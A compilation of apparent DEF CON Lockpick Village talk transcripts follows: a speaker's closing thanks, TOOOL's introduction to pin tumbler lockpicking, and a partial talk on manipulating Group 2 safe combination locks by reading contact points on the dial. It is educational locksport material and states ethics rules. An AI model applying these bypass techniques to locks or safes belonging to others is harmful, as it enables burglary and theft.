I have received an amazing amount of support from the community and wanted to list folks who are large influences for me. I encourage you to pore over previous DEF CON talks and find individuals who share your personal mindset and speak to you specifically. Use the knowledge shared in venues like this to build an even stronger community of sharing. While I know I am biased as an instructor, I recommend taking guided courses if you are able. Here are some I personally plan to attend as soon as we are able. You can learn physical security, social engineering, or really anything you like in a course guided by a professional in the field. A textbook will never have all the answers. Being able to raise your hand and ask the what-ifs and what-about-this types of questions is hugely valuable. Since we are all at DEF CON, you all have already nailed this, so well played. Attending events and local meetups is a great way to meet new people and network. The people I have met in Orlando through meetups and events have truly driven my career. I was able to learn all the skills I couldn't practice because either I personally did not have the tools or the content online didn't quite break things down well enough for me. Just getting introduced to people that could help me understand things between the lines of textbooks was awesome. Huge shout out to the folks at Citrus Sec in Orlando and DC407. If you see your city on the list, then that means there is a chapter of The Open Organization Of Lockpickers in your town. I encourage you to reach out to your local TOOOL group and meet some cool people. If you don't see your city, good news. You can now start a chapter in your town and find people that are into physical security. The Open Organization Of Lockpickers, or TOOOL, has been amazing to me and I love being a member. Second to last slide, I promise, but I want to say thanks to my family and friends. Mostly my wife and kids.
Thank you for understanding when I disappear into my lab for hours at a time for random projects. Thanks, Orlando hackers, for just being total class acts. I want to thank TOOOL for providing me an unbelievable networking opportunity and the ability to practice hands-on with locks and tools I would never have seen otherwise. Thanks, GoldSky Security, for the opportunity to learn and grow in an incredibly supportive environment. DEF CON, thank you for having me. This event is so special. And to the hacker community at large, keep being curious and keep pushing boundaries. I love helping people who are getting started or maybe who are stuck on something. Feel free to reach out. I might take a bit to respond, but I will do my level best to help. This was a lot of information in a short amount of time, so if you want clarification on something, I am at 31337Magician on Twitter, and here is my LinkedIn if you prefer that channel. Thanks for listening to my talk. That's all I have on this topic, but feel free to reach out if you want to have anything answered that you're still curious about. Have an excellent day and enjoy DEF CON.
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices and the techniques used to exploit those vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50741 (DOI)
Welcome to the Lockpick Village. We are The Open Organization Of Lockpickers, an international nonprofit organization dedicated to teaching hobbyist lock picking, sometimes called locksport. This is the TOOOL introduction to lock picking talk, where we will teach you real lock picking over the course of the next 20 to 25 minutes. To begin with, though, we have some rules. Because we are the good guys, the white hat hackers, ethical locksporters, we have two rules that we're very serious about. First, don't pick locks that you don't own, which includes the locks in your apartment or at the other institutions that you're at. Also, don't pick locks upon which you rely. We want lock picking to improve your safety and improve your ability to control your surroundings, not damage the locks or damage your personal safety. Follow those two rules, help us improve the impression of lock pickers, and help yourself stay out of trouble. The type of lock picking we're talking about today is pin tumbler lock picking, and it has two tools involved. Not one, not three or more. It's two hands with two different tools, doing two different tasks inside the lock. In Hollywood, you'll see them stick any old thing, a piece of chewing gum, a pen, inside the lock, and what do you know? It just falls open. In the real world, though, picking this type of lock takes two different tools with two different tasks. I show you this slide here so that you can see it at least once right before we talk about how it's actually done. As for the type of lock, that pin tumbler lock, well, that's the famous lock profile that you've seen just about every day if you're in North America, and in many places outside North America. Whether you see that shape in a deadbolt or a padlock, any time that you see that familiar curvy shape, that's the pin tumbler lock, and since about 1865, it has been what we mean when we say lock in North America.
You're used to seeing it from the outside; what you're probably less used to seeing is the inside. Let's go past that front face and look behind it. Here's your X-ray view and some vocabulary terms. There are a lot of terms here, but the one I want you to focus on is that one right in the middle, that blue pin, which we call the driver pin. Obviously they're not red and blue in real life, and we can't really refer to them as one pin, two pin, red pin, blue pin, nor can we refer to them as top and bottom pin, because in Europe, when they have these types of locks, they can often be inverted, and since they've been doing this longer than we have, they win: we don't call them top and bottom, we give them functional names. And the driver pin's job is to push down on that key pin. The key pin holds the driver pin up, and the spring makes sure that gravity doesn't affect what happens with those pins. If you want to think about it that way, the driver pin is the lock, because it's the piece that's half in and half out of that plug, that yellow plug that turns. If the driver pin sits right there, then the lock stays locked, and the spring and the key pin are just there to make sure that, unless and until the proper key is entered, that driver pin is in the way. We talk about the driver pin being in the way. What we mean is, it's at this dotted line called the shear line. The shear line isn't a part of a lock; it's a place, or really an absence of a thing, which is the separation between, again, the plug that turns and the housing that doesn't. As long as there's something at that shear line, usually the driver pin, the lock is locked, won't turn, and won't open. Here's what it looks like when you try to turn the lock with the driver pin still in place. It wobbles a little bit, but it doesn't open. Think of that driver pin as saying, no, no, still no, try again, I'm locked. The way to change that is with a key.
The key's whole job is to displace, to fill up that space so that the key pin rises up, which in turn pushes the driver pin up. And as soon as the driver pin is past that shear line and there is nothing at the shear line, i.e. the key pin is all the way in and the driver pin is all the way out, there's nothing blocking the plug; the plug can turn and the lock can open. If you take multiple driver pins, multiple key pins, and multiple springs, and you put those all in a lock body, you have a real, honest-to-goodness, bought-it-at-the-hardware-store lock. This is the lock at rest. A few things you'll notice about it. First, the driver pins are all in line at the shear line and they're all identical. Also, the springs are all identical up here; even though they look like they're different sizes, they're just doing what springs do and filling up space. The key pins are where the difference comes in: some are short, some are tall. That's where the variation lock to lock comes from. And by definition, the key for that lock is the reciprocal of each of those key pins. Notice that the pins don't fall all the way down to the bottom of the lock, because the hole that each pin is drilled into is just the right size to make sure that even though this area down here looks like it's just empty space, it's actually a little notch, so the pins don't fall all the way down to the bottom and there's room for the key. Now, if you have the right key for the lock, it slides in, you'll watch the driver pins go up and down, the key pins go up and down, and when it's finished, there's a nice clear shear line. You pull the key back out, everything returns to its resting state, and the lock is locked again. One more time: the springs give way and then they push everything back down to their new resting state with a clear shear line. If you have a key that is almost right, you have a lock that is almost unlocked.
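The reciprocal relationship just described, where each bitting cut must land its pin stack exactly at the shear line, can be modeled in a few lines of Python. This is only a toy sketch: the shear line height, pin heights, and bitting values below are all invented for illustration.

```python
# Toy model of a pin tumbler lock: the plug can only turn when every
# pin stack sits exactly at the shear line, with no pin above or below it.

SHEAR_LINE = 10  # arbitrary units measured from the bottom of the plug

def opens(key_pin_heights, key_bitting):
    # Each bitting cut lifts its key pin; the stack must land exactly
    # at the shear line in every position for the plug to turn.
    return all(pin + cut == SHEAR_LINE
               for pin, cut in zip(key_pin_heights, key_bitting))

pins = [3, 6, 2, 5, 4]                      # invented key pin heights
right_key = [SHEAR_LINE - p for p in pins]  # the reciprocal of the pins

print(opens(pins, right_key))        # True: a clear shear line everywhere
print(opens(pins, [7, 3, 8, 5, 6]))  # False: second position is a bit low
```

Note that the failing key in the last line is wrong in only one position, which, per the model, is enough to leave one pin at the shear line and the lock locked.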
In this case, this key is right in the first position, third, fourth, and fifth position, but the second position, it doesn't lift the key pin quite high enough, which means the driver pin isn't lifted quite high enough and there is still one driver pin at the shear line. This lock is almost open, but almost is not good enough, it's still locked. You can have the alternate problem, where now we have a key that is a little too high in that second position, which means it's pushed that key pin up above the shear line. Key pins are just as happy as driver pins to block the shear line and prevent that lock from opening. But of course, where we're going, we don't need keys. So if you came here just to learn about keys, then you can go, you know everything there is to know about pin tumbler keys. If you wanna learn about lockpicking, then kick your brain into overdrive, because this is the complicated part here. In a perfect world, lockpicking would not be possible. Now that wouldn't be a perfect world for all of us that love teaching lockpicking and love doing lockpicking, but when I say a perfect world, I mean, mathematically perfect, where things roll off the production line exactly the way they were designed. Here is a schematic view of a lock. We've taken that plug, you've taken all the springs, key pins, and driver pins out of it, and we're just looking at the holes that they go into. You'll notice that those holes are perfectly in line, which means when you try to give that plug a turn after you filled it with springs, driver pins, and key pins, each one of those driver pins that is right on the shear line, every single one of them says together and in unison, no, stop, go no further, the right key isn't in here, this lock will remain locked and they agree on that. And that would be great if such a lock existed because it would be unpickable reason being the only way to open the lock would be to lift each and every one to the right height at the right time. 
And if you can do that, then you have what's called a key. In the real world, however, no lock is perfect. So what you see here is the downsides of mass production. Cheap locks, not bad locks, just inexpensive locks built with different priorities in mind, cost effectiveness being one of them. So here you see the chipping, the marring, the misalignments, the rusting that comes from a real world piece of equipment. As a result, if you put key pins into it, then you'll see that they don't all align. In fact, up here at the top, the holes have drifted fairly far to the left. And down here at the bottom, the holes have begun to drift to the right. Of these one, two, three, four, five, six pins, only about one of them is in the center where it's intended to be. All the rest of them wobble a little bit. So here's what it looks like in the real world. We've taken this plug again and we've redrawn it to be schematic of what you'd see in a real lock in the real world. It was manufactured off a real manufacturing line. And you'll see that all the holes are still there, but now they wander a little bit. We put this dotted line here to make it a little bit more obvious. And you can see that the one, two, three, fourth pin here is the most out of line. If they are not perfectly in line, then by definition, one of them has to be the most out of line. In this case, in this particular example of a lock, it's the fourth pin that is the furthest to the right, which means if we were to give that plug a turn, well, it wouldn't open because it's not that bad. But what it would do is it would stop on the one and only one driver pin that is actually in the way, which is the one furthest to the right. So you can think of it as five pins, but now instead of agreeing whether the lock should stay closed, four of them are silent. They don't even notice the plug is being turned. One and only one of them is saying, stop, go no further. 
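That one most-misaligned pin is what gives each lock a deterministic picking order: set the worst offender, and the bind transfers to the next-worst hole. A toy simulation of the idea, with hole offsets invented to stand in for manufacturing drift, might look like this:

```python
# Toy simulation of single-pin picking: under tension, the pin whose
# hole is most out of line binds first; setting it lets the plug turn
# a hair, transferring the bind to the next-most-misaligned pin.

def picking_order(hole_offsets):
    # Return the order (by pin index) in which pins bind and get set.
    remaining = dict(enumerate(hole_offsets))
    order = []
    while remaining:
        binder = max(remaining, key=remaining.get)  # most misaligned pin
        order.append(binder)   # lift it to the shear line: it sets
        del remaining[binder]  # plug rotates slightly; next pin binds
    return order

# Invented drift, in mm, for pins 0 through 4.
offsets = [0.02, 0.11, 0.05, 0.17, 0.08]
print(picking_order(offsets))  # [3, 1, 4, 2, 0]: the fourth pin binds first
```

The picker, of course, doesn't know the offsets in advance; discovering which pin currently binds by feel is the whole skill.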
In other words, you've paid for five pins' worth of security, and you're only getting this one pin's worth of security right now because of manufacturing tolerances in the lock. So it stands to reason that if this is the one and only one pin that is blocking your progress, if you could reach inside the lock with some sort of lock pick and lift up on that key pin, it would lift up on the driver pin. And if you managed to get that driver pin above the shear line, then nothing would be stopping the lock from turning. And it would turn. How far would it turn? Not a lot, just until it stopped at the next pin that was in the way. On this diagram, it might be the first one. You have to figure that out for yourself, lock by lock, pin by pin. Remember, these are not intentional. These are manufacturing defects, or manufacturing tolerances. But that's the nature of hacking: given an inch, or given a fraction of a millimeter, we will take a mile. This allows us to pick each pin individually using only one lock pick. So let's look back at that attempt without a key. If you turn the plug, the plug turns a little bit and then stops on that driver pin. We call that the binding pin. If you can find the binding pin, then your job is to solve the binding pin. Lift up on it just enough such that the key pin pushes the driver pin above that shear line, and watch what happens: something magical. The plug turns under the driver pin, and the driver pin can't go home again. One more time: once the driver pin goes above the shear line, the door closes behind it and traps it up there. In other words, it's a mechanical autosave. It's like a ratchet mechanism. It's not designed that way; it's an effect of the manufacturing tolerances, and we're going to exploit the heck out of it to allow us to set multiple pins in a row until there are no more to set and the lock falls open. Here's what it looks like in practice. We're first going to tension the lock.
If there's no tension, then you're not picking the lock. You're just lifting up pins, and they'll fall right back down. You need to tension the lock to create that bind in the first place. Once you've created the bind, your next job is to find the bind. Go through the pins sequentially and lift up on each one, so you find one that has a little bit of a grind, crunch, creak, something, anything other than the squishiness that says, it's not the binding pin, it's just the spring. This may take a little bit of practice, keeping track of where you are in the lock and learning how to feel the subtle differences between the pins. That's the skill of lock picking. But as you get better at it, you'll be able to find each binding pin, push it up just the right amount, get the click, get the feedback, get the little bit of turn of the lock that tells you it's set, and then you go on to the next one. Do that for as many pins as there are in the lock, and the lock will just fall open. This is not like a big safe lock where you've got to thump it open at the end, because you've been turning since the very beginning and taking away each and every obstacle to the turning. So if you just put the tension in and start turning, that same constant, steady pressure will serve you all the way through to the end. And every time you set a pin, the lock will turn just a little bit more, until, when you've removed all the pins in the way, it will just fall open. Now let's take a look at one of the most common problems in lock picking that will stop you cold, especially if you don't know to be on the lookout for it. We call it overlifting, and that's when you replace one problem with another by putting the key pin up above the shear line, where the driver pin normally is.
You see, this person picking along had a short one in the fourth position and another short one in the third position, which means when it comes time to pick the last one, with a little bit taller key pin, they lift it too high and it gets bound above the shear line. The only way to get out of this position is to release your tension down here, shake the Etch A Sketch, and lose all your progress. So just like getting a haircut or salting the soup, you can always go back and do more. It's very hard to go back and do less. So light hands, small movements. Remember how small these pieces are and avoid overlifting. You'll save yourself a lot of trouble. And of course, if you do get stuck, that's okay. Shake it out, shake your hands out, shake the lock out, start over, and you'll do better next time. We've talked a lot about what this hand is doing using the lock pick. But let's talk about the unsung hero, the turning tool. A lot of very intelligent pickers will tell you very seriously that in all practicality, the turning tool is what picks the lock, because the turning tool is responsible for putting that all-important, constant, steady pressure on the lock. As far as how to apply that pressure, well, first, we like using that big finger, the precision digit, and putting it far out on the turning tool so that you can use leverage and amplify any feedback you get. Next question: how much turning pressure? And I will tell you honestly, there are good reasons to use light pressure, and there are good reasons to use heavy pressure, and someone who tells you one or the other isn't wrong; they're weighing different things. We at the Lockpick Village tend to tell novice lock pickers to start off with light pressure. That has a lot more to do with not damaging the locks or the equipment than it does with being the most effective way to pick locks. A lot of very good lock pickers tend to use quite heavy tension, but very carefully modulated heavy tension.
They use the right amount of tension to get the feedback from the lock. So experiment with the tension levels, but most importantly, don't put on more than you can confidently, comfortably, and safely use. As for the type of picks, you'll probably have a lot of picks in your kit. We call this one the hook. We call this one the half diamond, because apparently triangle is too hard to say. This is sometimes called a rake, a snake rake; there are lots of varieties of cool little wiggly ones. When you're just starting off, we recommend starting with these two, either the half diamond or the hook, because they tend to promote the best practice and give you the most accuracy in picking one pin at a time. Now, as you're starting off, there's a tendency to figure out how you want to lift in the lock. You could put it against the bottom. You could put it against your finger. You could float it in midair. Whatever works for you, mindful of the task that you're trying to do, which is feel very small things in a lock and get it to turn. So don't add any more friction to the lock than you need to, and don't rub up against the sides or other material in the lock more than you need to. But mostly, it's a matter of personal choice. Accept that. If you're doing something like this rocking lifting, I want you to make sure that lifting doesn't turn into crowbarring. These are precision tools, and if you're really digging, especially if you're using really heavy tension and you start getting really firm binds, there's a tendency to start crowbarring, and the pick starts to bend, which means it's no good for anyone. If these are your tools, then that's too bad, because you're out of a tool. If they're our tools, it's almost worse, because then not only can we not use it, but no one else can use it either, and it makes it harder to put on Lockpick Villages like we love to do. So as you're picking, be gentle. Remember these are precision tools.
I put up a picture of the bunny here, not because I think you're children, but because I know I've thrown a lot of complex information at you, and if I show you a picture of a crying bunny, you'll remember: be gentle. Ease up. Use the tools with precision. Now, if you're just starting lockpicking, there's a great activity that everyone would benefit from, and that's this. Pull the turning tool out of the lock. Just for this one time, don't try to pick the lock. What I want you to do is feel the tension. Think of this as a tension taste test, or a springiness taste test. Reach into the lock with the pick of your choice, and on that one pin, just lift up on that pin. This is especially great if you have a lock that's had all the other pins taken out, so there's just one to focus on. But you can do it with other locks, too, with a little bit of cleverness. Just lift up on that pin and feel what a springy pin feels like without any tension. Then, and only then, add the turning tool so that you have a little bit of tension. And now, if there's only one pin in the lock, you've created a binding pin. Now go in and try that one on for size. Feel that binding, grinding, crunching, scraping. Characterize it however you want. But being able to tell the difference between the binding pin and the unbinding pin without tension is the essence of lock picking, and zeroing in on that feeling will make you a much better lock picker. Of course, the most important part of lock picking is practicing, and at TOOOL we've gone to a lot of effort to create practice locks specifically designed for learning lock picking. If you're at one of our Lockpick Villages, we have multiple locks that have some of the pins pulled out of them, so you can go from a one-pin lock all the way up to a six-pin lock and learn as you go. But you don't need TOOOL locks to practice. You can get locks at your hardware store. You might find padlocks like this. They work fine. They're cheap locks.
But they'll teach you enough about lockpicking. You can also find just regular door deadbolt locks. It doesn't matter what type of locks you get, as long as you sit down with them, you practice with them, and you have enough of them that you have variety. So you're not learning how to pick a particular lock. You're learning how to pick locks in general. Because you're at home, I wanted to run you through some frequently asked questions that we often hear, and see if we can get you set up on the right path. Preston, how do you hold the lock? What we like to do is turn the lock so the top part is deep in the web of your hand, and then you can close these two knuckles here over the lock. That holds it fairly gently but securely. And then if you stick out that index finger, the turning tool will just rest right against that index finger, giving you the right amount of pressure. How do I hold the pick? Well, think of it like a scalpel. This is a surgical tool. So hold it like a scalpel. That pencil grip works great. This one doesn't work so well, because you've got a little bit too much grip, and people tend to start digging too hard. And then, of course, holding it like a shiv is right out. That's dangerous and weird. Avoid that. And if you happen to have locks that are out of their housing, so that you can see the back of the lock, which people don't typically see, we want to make sure that you know that the pick goes in this part, this shiny silver front. If you can see the back, which looks like that, that's the wrong end of the lock. Go in the front. You'll have a lot more luck. Now, lockpicking is not supposed to be easy. This is new. This is a skill-based exercise. Evolution has done nothing to prepare you for it. So I want to make sure that as you're doing this, you're nice to yourself. Relax. If you want to have a beer, talk to somebody, that's all part of the fun. That's what we do when we're doing TOOOL meetups. We sit around. We chat with each other. We relax.
We have fun with it. And if you don't know what that animal is, now you have seen a baby wombat, and your day is better. And then, traditionally, in locksport, no matter what the lock is, whether it's a practice lock or it's a project lock that you've been working on for weeks, when you get it open, say "open." Own it, celebrate it. All locks you open are worth celebrating. And we want you to have fun with it. Lastly, if this sounds like fun to you, we are a membership organization. We have members all over the United States, Canada, UK, Australia, and many other countries. We would love you to join and be a part of the organization from your home, or in person as soon as we can. So go check out members.toool.us. And of course, if you can't wait to get lockpicking, and you want to get your hands on lockpicking gear as soon as you can, then toool.us/equipment has exactly the gear that we like to train people on. And we'd love you to get started on it too. So happy lockpicking. Practice, be gentle, celebrate your wins, and we'll see you at the next lockpick village.
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices and the techniques used to exploit these vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50742 (DOI)
Welcome to Safe Cracking for Everyone. A little bit about myself: who am I? My name is Jared Diger. I'm a locksport enthusiast, gamer, rock climber, game developer, and I've been picking locks and cracking safes for about a decade now. So this talk is going to cover how Group 2 safe locks work. Mechanical combination safe locks are divided into two groups. There's Group 2, which is your basic safe lock, with no anti-manipulation features in it. It's also the most common type. And then there's Group 1, which is more complicated and includes various measures to keep people from figuring out the combination. Now whether you buy a $500 safe or a $5,000 safe, if it comes with a mechanical safe lock, it will most likely be a Group 2 safe lock. Very rarely are there Group 1 safe locks that come by default on a safe. Basically you have to pay hundreds of dollars extra for the lock, even more to get it installed, and it is not very common at all. So I'll be covering these Group 2 safe locks in this talk. I'll cover the flaws in this design and how to exploit them, along with specific techniques that are used to crack the combination. And at the end, I'll cover some slight differences between various Group 2 safe locks, since not all manufacturers create them the same way. First thing is knowing the parts of the lock. So this is the back of the lock with the back cover removed, and you can see that there is a silver lever here. Now the end of this lever has a protrusion, and this protrusion is called the nose. This nose is resting on a brass wheel. The brass wheel is called a drive cam. And this drive cam, you can see, has a cutout in it. This empty space in the drive cam is called the contact area. You can see where the cutout starts on either end, and those are the contact points. So the cutout is the contact area, and each end of the cutout where it starts is a contact point. And this drive cam is controlled directly by the dial.
So there's a metal rod you can see in the middle, and that connects it directly to the dial. It's locked in place with this key. So whenever you turn the dial, the drive cam moves at the same time as the dial. Behind the drive cam, you can see a larger silver wheel. There are three of these wheels generally in each lock. Sometimes there could be four, but most often it's three. Now this wheel that we see here is called wheel three. It's the third wheel. It's closest to the drive cam, and when you're in front of the lock, it would be furthest away from you. And the other two wheels are behind it. Now each of these wheels is exactly the same. There is a cutout in each of these wheels called a gate. Now these gates come into play when you dial the combination. There is a metal bar on the back of this lever called the fence, and when you dial the correct combination, all of these gates line up under the fence. So that when you turn the dial so the contact area is under the nose, the lever can then fall down, and the fence fits into the gates nice and easily. So here you would just continue turning the dial, and that would pull in this lever, and that retracts the bolt. The lever is attached to the bolt, and that pulls it in so that you can turn the handle and open the safe. The handle of a safe just pulls in the outermost bolts around the edge of the door so that you can open it, but the lock itself only locks the handle. So that's basically how safes operate. The mechanism locks the handle, and the handle is what pulls in the bolts from the outer edge of the door. Now to demonstrate that, I have a lock here, and if we look at the back, you can see the drive cam. Whenever I spin the dial, the drive cam moves with the dial. So if I were to dial in the combination, that would involve putting the gate of the first wheel under the fence, and then I would put the gate of the second wheel under the fence as well. I messed that up, but I will just fix it.
And then I put the gate of the third wheel under the fence. I simply turn the drive cam so everything can fall in, and then that will retract this bolt when I continue turning. Now the way that it works is each of these wheels has a protrusion on one side, and that fits into a groove of the next wheel. Now this protrusion will ride in this groove as the wheel spins until it hits this metal piece of the next wheel, at which point this next wheel will start to spin along with the previous wheel. And this wheel also has a protrusion which rides in a groove of the wheel next to it, and then after a whole rotation, it will hit this metal bit, and then the next wheel will start to spin along with the rest of the wheels, essentially picking up each wheel after each rotation. So the drive cam has that sort of protrusion as well. So right now everything is spinning together, but if I were to spin the other way, you can see it is only the drive cam spinning. And after I make one full rotation, this third wheel, the wheel closest to the drive cam, starts spinning with it. So the third wheel gets picked up first, and then after another full rotation, you can see that the second wheel starts to get picked up as well, and it is spinning along with it. After another rotation, this first wheel gets picked up as well. And the wheels are named this way because the first wheel corresponds to the first number in the combination. Since it is the last to get picked up, it is set first. So then you can freely mess around with the other two wheels without upsetting the position of that first one. So the third wheel gets picked up first, corresponding to the third number in the combination, then the second wheel, and then the first wheel.
Then you reverse directions because if you were to keep going, it would mess up the position of the first wheel. So you reverse directions, spin three times with the right rotation, so now we are turning counterclockwise. So now we are turning clockwise to the second number, and then you do that three times. So you pass the second number twice, stop on the third time, and then twice with counterclockwise rotation, so we are reversing rotation again to the final number. We pass it once, and then we stop on the second time. Then we turn right until the bolt is retracted. Now the reason for this is because you have to spin three times to ensure all the wheels are picked up. You don't know the state of this wheel pack when you approach the lock. So it could be someone spun it to the right all the way before you approached it. So you want to make sure you spin one full rotation. We'll pick up that third wheel, two full rotations, picks up the second wheel, and then three full rotations ensures that that first wheel gets picked up. So we just passed the first number in the combination three times. So now we have to go to it and stop on the fourth time. We reverse directions because otherwise it would mess up the position of that first wheel. So we do one full rotation, pick up the third wheel, two full rotations. Now we pick up the second wheel, and so we pass the second number twice, and we stop on the third time. I overshot it again, reverse directions, one full rotation picks up the third wheel, and then we stop on the second time. And then we can turn right until everything drops in and the bolt retracts. Here's a really bad drawing. I missed the label with this. This is wheel two in the middle. So the dial will turn the drive cam until this protrusion picks up wheel three. And then after rotating for some time, wheel three will pick up wheel two, and then wheel two after rotating will pick up wheel one. And so then they'll all start spinning together. 
There's a lot of vulnerabilities in this design. So you can see here, when none of the numbers are dialed in correctly, we turn the dial so that the contact area is under the nose, and that allows the fence to drop down onto the wheel pack, essentially testing it for the correct combination. But the thing is, these wheels are not perfectly circular, and they're not the same size as each other. Some will be bigger, some will be smaller, and some will have bumps and dips, and that's because of manufacturing tolerances. It's basically impossible to get rid of these imperfections. What this means is, since one of these wheels is bigger, the fence is not going to be resting on all of the wheels at the same time. You can see here, between wheel three and the fence, there's actually a bit of space. It's not touching. Wheel two here, you can see, is larger than wheel three and wheel one. The fence is only touching wheel two. Now we can also see that this contact area, where the contact points are on either end, is sloped going down. That means there is less wiggle room, so to speak, between the sides of the contact area the further down you go. Let's pretend that wheel two's number in the combination is dialed, so that the gate for wheel two is now under this fence. What would happen? Well, the fence would not rest on wheel two anymore. It would drop down ever so slightly and rest on wheel three. That means the nose would be lower in the contact area, and there's less wiggle room between the contact points. The really cool thing about this is you can feel this on the dial. So if I were to reset this, you can see that the nose drops into the contact area when it's over the contact area, and that allows the fence to rest onto the wheel pack. So if the largest wheel has its gate under the fence, this nose is lower. This wiggle room, this bit of resistance, you can feel each contact point from the dial.
That wiggle room would be less. So the contact points: about 96 for the left one. We name them from viewing the dial from the front. So the more sloped side here on the left in this view is the right contact point, because from the front of the safe, that's the right. So this left contact point is about 96, and the right contact point is about 3. But if perhaps two of the wheels were dialed with the gate under the fence, we might feel this at 98 and 2; thus the closer the contact points, the less wiggle room. So that is a major vulnerability, and the main thing we use in order to determine the combination. So we can know through this when the gate of the largest wheel is under the fence, simply because there will be less wiggle room between the contact points. So the first step is finding a number in the combination with this information that we now have. So what we do is we take a series of test combinations, every two or two and a half numbers. The tolerances of these locks sometimes allow you to go every two and a half, but generally it is safer just to go every two numbers. And there are two contact points, the left and the right, but as shown earlier, the right side of the contact area is more sloped. So there will be a greater change in the amount of wiggle room at the right contact point. The left will move in a little bit, but not as much as the right. So we really only need to know what the right contact point is at any given time. And you can graph this as well. So I've got my graph paper right here. You can see this is a basic layout of a graph. So along the top we have zero to a hundred. And then here I put the closest whole number to the left contact point, one above and one below. Same thing with the right contact point, one above and one below. And as I mentioned, you don't really need the left contact point, but it is good supporting evidence if the right contact point is not really giving clear readings, which we will cover later.
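Since the spread between contact points is the quantity everything else hinges on, it is worth pinning down how to measure it. The following one-liner is a hypothetical helper of mine, not from the talk; the only subtlety is that the dial wraps at 100, so the distance from a left contact point of 96 to a right contact point of 3 is 7 numbers, not negative 93.

```python
# Wiggle room between the left and right contact points on a 0-99
# dial. Modular arithmetic handles the wrap past zero.
def contact_spread(left, right, dial_size=100):
    return (right - left) % dial_size

print(contact_spread(96, 3))  # the 7-number spread from the talk
print(contact_spread(98, 2))  # narrower: a gate is under the fence
```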
So you can graph both of the contact points like this. So the first thing is you want to turn the dial left three times to pick up all of the wheels, and then stop on the first reading, so we can say we're going to try zero. Now the reason we spin left and we pick up all the wheels with left rotation is because the combination is dialed with left, right, and then left rotation. So left to the first number, right to the second, and then left to the third. So if we find a number, it's kind of random; we don't really know which wheel it's going to be at first. We just know one of the wheels is larger than the rest, and we want to figure out when that wheel has its gate under the fence. So it's just statistics that it's going to be more likely the first or the third rather than the second. Also, because of the way the locks are designed, wheel three would generally be larger, or will be the wheel that makes contact with the fence first. So that's more reason to start with left rotation first. So what we do is we spin the dial, pick up all the wheels with left rotation, and then we stop on our first test combination. So in this case, that would be zero, zero, zero. We stop at zero. And then what we do is we want to reverse directions, because if we were to keep going, that would mess up the position of the wheels. So we reverse directions until we get within the contact area. So remember, our contact points are 96 and 3, so we want to spin left until we're within that. So we don't want to pass zero, because remember, after one full rotation we pick up the third wheel. So we just want to go between zero and three. And then you just spin (I accidentally passed it, but we'll ignore that for now). You want to gently spin the dial left until you hit the contact point, and you don't want to ride up on it. You don't want the nose to ride up onto the drive cam. You just want to go lightly and stop when you feel that bit of resistance, and then you can record that.
So on the graph: at zero, dialing down to three, let's say we feel it at two and seven eighths. Then you can mark that, two and seven eighths, for zero. So that would be about here. And this is also really important: you want to be able to differentiate to one eighth of an increment. And that's really hard to show on camera here, because it's not really precise, and also the resolution of the camera. But you want to be able to look at the dial and know whether it is showing, like, a two and seven eighths or a three, or a 35 and one eighth or a 35 and two eighths. And you want to be able to accurately record that, because what we're looking for is a change of one quarter of an increment. So we want to make sure that our measurements are taken with a precision of one eighth of an increment, just to be safe. Okay. So we're going to pretend that we did this for all the numbers on the dial. So I'll just fill it in with some random points, and I'm just putting a generic reading here. And as stated earlier, you can record the left contact point here as well; it's just that it's not going to show as much variation. So here, essentially what we're doing is we are taking the overall shape of all the wheels of the wheel pack, and we're just laying it out in a line. So if this were to be cut into a strip of paper and put into a circle, this is what the wheel pack would look like on a very fine scale, because remember, they're not perfectly circular. So on a very fine scale, there's a lot of bumps and ridges and whatnot. Now if you remember, I'll show the picture again of the close-up: when the gate of the largest wheel is under the fence, that causes a drop. There's less wiggle room. That right contact point moves in, so it gets lower. The left contact point would get higher. So that's essentially what we're looking for on the graph.
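If you keep your readings in a table rather than on graph paper, spotting the drop can be automated. The following is a rough sketch under my own assumptions (readings every 2 numbers, a flat baseline, a quarter-increment threshold); real graphs are bumpier, so treat it as an illustration of the idea rather than a working manipulation tool.

```python
# Scan right-contact-point readings for the gate signature described
# above: a drop of at least a quarter increment, lasting one or two
# test numbers, relative to the rest of the wheel pack.
def find_gate(readings, threshold=0.25):
    baseline = max(readings.values())
    dips = [n for n in sorted(readings) if baseline - readings[n] >= threshold]
    if not dips or len(dips) > 2:
        return None  # no dip, or too wide to be a gate
    return sum(dips) / len(dips)  # centre of the dip

readings = {n: 3.0 for n in range(0, 100, 2)}  # flat everywhere...
readings[38] = 2.75                            # ...except a quarter-
readings[40] = 2.75                            # increment dip here
print(find_gate(readings))  # → 39.0
```

Because dialing tolerance is loose, landing on the centre of the dip is good enough, as the talk notes next.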
We're looking for where the right contact point drops down for maybe a number or two and then goes back up, because the gate would be under the fence, and then you would go past it and it would not be under the fence anymore. So it would drop down and go back up. So essentially, you want to look for the shape of a gate in these readings. Now you can see there's a drop here, but it goes on for a little while before going up. So that's probably not it. That'd be really wide for a gate. But here you can see it drops down by a quarter of an increment for two readings and then goes back up. The thing about these safe locks is you don't have to be precise in dialing. That is also why we go every two numbers. You go from zero, to two, and then four, every line here on this graph. So if the combination is 16, 28, 40, you can dial 17, or maybe 18, 28, 40, and it would still open. So you want to look for the shape of the gate in the graph. The middle of that gate will tell you one of the numbers in the combination. Now we're going to assume that the number we found is 40. So at this point, we know that the largest wheel in the lock has 40 associated with it. Okay, but we don't know which wheel yet. We just know that one of the wheels in the lock is larger than the others, and the point at which the contact points go closer together and then further apart centers around 40. So we do something called the high-low test. We put the first wheel 10 numbers lower, and we put the other two wheels on the correct number. So we're pretending we found 40 as the correct number. So 